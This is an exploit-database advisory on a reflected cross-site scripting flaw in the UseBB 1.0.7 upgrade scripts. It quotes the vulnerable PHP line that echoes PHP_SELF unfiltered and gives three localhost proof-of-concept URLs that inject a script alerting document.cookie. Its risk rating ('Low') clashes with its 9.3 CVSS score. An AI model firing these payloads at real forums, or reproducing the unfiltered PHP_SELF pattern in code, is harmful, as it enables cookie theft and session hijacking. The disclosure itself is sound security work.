UseBB 1.0.x Cross Site Scripting (XSS)

2007.07.25
Credit: S4mi
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

############################################################# # Script...............: UseBB version: 1.0.7 # # Script Site..........: http://www.usebb.net # # Vulnerability........: Cross Site Scripting (XSS) # # Acces................: Remote # # level................: Dangerous # # Author...............: S4mi # # Contact..............: s4mi[at]LinuxMail.org # ############################################################# The affected Files : ==================== /UseBB/install/upgrade-0-2-3.php /UseBB/install/upgrade-0-3.php /UseBB/install/upgrade-0-4.php vuln Code: line ~ 86 ===================== [code] return '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><p><input type="hidden" name="step" value="'.$step.'" /><input type="submit" value="' . ( ( $_POST['step'] == $step ) ? 'Retry step '.$step : 'Continue to step '.$step ) . '" /></p></form>'; [/code] The variables PHP_SELF is used without filtering PoC : ==================== http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/"><ScRiPt>alert(documen t.cookie);</ScRiPt> http://127.0.0.1/UseBB/install/upgrade-0-3.php/"><ScRiPt>alert(document. cookie);</ScRiPt> http://127.0.0.1/UseBB/install/upgrade-0-4.php/"><ScRiPt>alert(document. cookie);</ScRiPt> Solution : ==================== filtre the PHP_SELF or you know what's the best lool : Delete the Install directory :D Shoutz : ==================== Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r ....... & all Others


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top